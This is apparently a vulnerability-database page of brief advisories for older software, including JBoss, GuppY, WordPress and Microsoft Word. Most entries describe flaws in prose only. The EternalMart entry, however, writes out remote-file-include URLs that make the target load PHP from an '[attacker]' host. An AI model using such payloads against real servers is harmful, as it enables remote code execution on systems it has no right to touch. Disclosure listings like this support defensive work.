header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Easy File Sharing Web Server Information Disclosure Vulnerability

Easy File Sharing Web Server has been reported prone to an information disclosure vulnerability. The issue presents itself due to insecure default permissions set on folders that contain Easy File Sharing Web Server log and configuration files. It has been reported that a remote attacker may make a HTTP request for affected log and configuration files and disclose potentially sensitive information contained therein.

Remote Command-Injection Vulnerability in JBoss

A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Attackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.

GuppY Remote File Access

GuppY is prone to an issue that could allow a remote attacker to read or write to files on the vulnerable server. This issue presents itself in the tinymsg.php component of the software. The attacker could only access files to which the webserver has access. An attacker can send a specially crafted HTTP request to the vulnerable server, which will allow them to read or write to files on the server.

GuppY Cross-Site Scripting Vulnerability

GuppY is reported to be prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the postguest module of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. Other attacks may also be possible.

EternalMart Mailing List Manager and Guestbook Remote File Include Vulnerability

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php and http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php

Divine Content Server Cross-Site Scripting Vulnerability

It has been reported that Divine Content Server is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the 'pagename' attribute in the error page of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. Other attacks may well be possible.

Microsoft Word Memory Structure Vulnerability

It has been reported that Microsoft Word is prone to a vulnerability that may allow an attacker to crash the software. The problem occurs when an attacker modifies the memory structure of a Word document. If a user opens the malformed document, it would cause the software to crash. This could potentially allow for corruption of memory, resulting in a possibility of arbitrary code execution, though this has not been confirmed.

Denial of Service in Microsoft Internet Explorer

A problem has been reported in Microsoft Internet Explorer when absolute positioning is used. Because of this, it may be possible to deny service to users of the browser. This issue may be due to memory corruption, however, it is known not at this point if it may be exploited to execute arbitrary code. It has been reported that the exploit code for this issue may also cause Eudora to crash. This may simply be due to Internet Explorer being set to render HTML content for Eudora.

WordPress Multiple SQL Injection Vulnerabilities

Wordpress has been reported prone to multiple SQL injection vulnerabilities. The issues have been reported to exist in the blog.header.php script. A lack of sufficient sanitization performed on 'cat' and 'order_by' URI parameters, may allow an attacker to inject malicious SQL code and thereby influence legitimate Wordpress SQL queries. Ultimately an attacker may exploit this vulnerability to insert SQL code into Wordpress requests and have the SQL code executed by the underlying database server.

Recent Exploits: